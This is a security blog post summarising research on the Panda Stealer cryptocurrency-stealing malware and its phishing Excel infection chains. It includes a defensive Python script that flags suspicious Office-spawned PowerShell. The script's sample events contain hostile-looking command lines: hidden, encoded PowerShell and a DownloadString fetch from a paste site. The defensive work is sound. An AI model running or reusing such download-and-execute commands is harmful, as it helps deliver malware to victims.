Panda Stealer is a new information stealer that targets cryptocurrency wallets as well as applications like Discord, Telegram, and Steam.
Trend Micro discovered it at the start of April and identified two infection chains being used. From their report:
“In one, an .XLSM attachment contains macros that download a loader. Then, the loader downloads and executes the main stealer… The other infection chain involves an attached .XLS file containing an Excel formula that utilizes a PowerShell command to access paste.ee, a Pastebin alternative, that accesses a second encrypted PowerShell command.”
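The delivery chain described above leaves a distinctive footprint in endpoint telemetry: an Office application spawning a script host, a paste site in the command line, or PowerShell run hidden or with an encoded command. The following is an added example (not code from the Trend Micro report or the article) that applies those three checks to process-creation events; the event fields, rule names and sample events are constructed for illustration.

```python
import ntpath
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style fields).
# These are illustrative only, not telemetry from the Trend Micro report.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -enc PLACEHOLDERBASE64"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c \"(New-Object Net.WebClient).DownloadString('https://paste.ee/r/PLACEHOLDER')\""},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\scripts\nightly-backup.ps1"},
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Paste sites named in the report's infection chain (paste.ee is a Pastebin alternative).
PASTE_SITES = re.compile(r"paste\.ee|pastebin\.com", re.IGNORECASE)
# -w hidden / -WindowStyle hidden, or -e / -ec / -enc / -EncodedCommand as a standalone switch.
HIDDEN_OR_ENCODED = re.compile(r"(^|\s)-(w(indowstyle)?\s+hidden|e(c|nc|ncodedcommand)?(\s|$))", re.IGNORECASE)


def basename(path):
    # ntpath handles Windows separators regardless of the host OS the rule runs on.
    return ntpath.basename(path).lower()


def classify(event):
    """Return the list of rule names an event matches (empty list if benign)."""
    reasons = []
    if basename(event["parent"]) in OFFICE_APPS and basename(event["image"]) in SCRIPT_HOSTS:
        reasons.append("office-app-spawned-script-host")
    if PASTE_SITES.search(event["cmdline"]):
        reasons.append("paste-site-in-command-line")
    if HIDDEN_OR_ENCODED.search(event["cmdline"]):
        reasons.append("hidden-or-encoded-powershell")
    return reasons


def detect(events):
    """Map event index -> matched rule names for every event that triggers at least one rule."""
    hits = {}
    for i, event in enumerate(events):
        reasons = classify(event)
        if reasons:
            hits[i] = reasons
    return hits
```

Any single rule is noisy on its own (administrators do run encoded commands); the Office-parent rule combined with either of the other two is the pairing worth alerting on.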
Once installed, Panda Stealer collects details such as private keys and records of past transactions from various digital currency wallets, including Bitcoin, Litecoin, and Ethereum.
Phishing campaigns deliver this malware by luring victims into opening infected Excel files. Panda can also take screenshots of the infected computer and steal data from web browsers.
Panda Stealer is very similar to the Collector Stealer (DC Stealer) malware that has been sold on the dark web. Key differences include different C2 URLs, build tags, and execution folders.
“Besides cribbing from Collector Stealer, Panda Stealer has borrowed from another piece of malware: Namely, it uses the same fileless distribution method as the “Fair” variant of Phobos ransomware to slip past detection. In other words, it runs in memory after initial infection, instead of storing files on the hard drive.”
This is the most interesting part. Instead of relying on dropped executables, these threats misuse tools that are already present on the system to carry out the attack. The threat lives in the machine's memory and tends to leave no traces behind, which bypasses traditional security software that looks for files written to the machine's disk, scans them, and assesses whether they are malicious.
“Panda drops files in targeted systems’ Temp folders, storing stolen information under randomized file names. Then, it exfiltrates the stolen data and sends it to a C2 server.”
It's interesting to see how data exfiltration is often performed. Tools like PacketWhisper are often used for stealthy exfiltration. The researchers were led to a login page titled 熊猫, Chinese for "panda". There were 14 victims listed in the server logs. They also found a VPS rented from ShockHosting that the operators were using to host the C2. Since the report, ShockHosting has suspended the server.
Sources: https://www.zdnet.com/article/panda-stealer-dropped-in-discord-to-steal-user-cryptocurrency/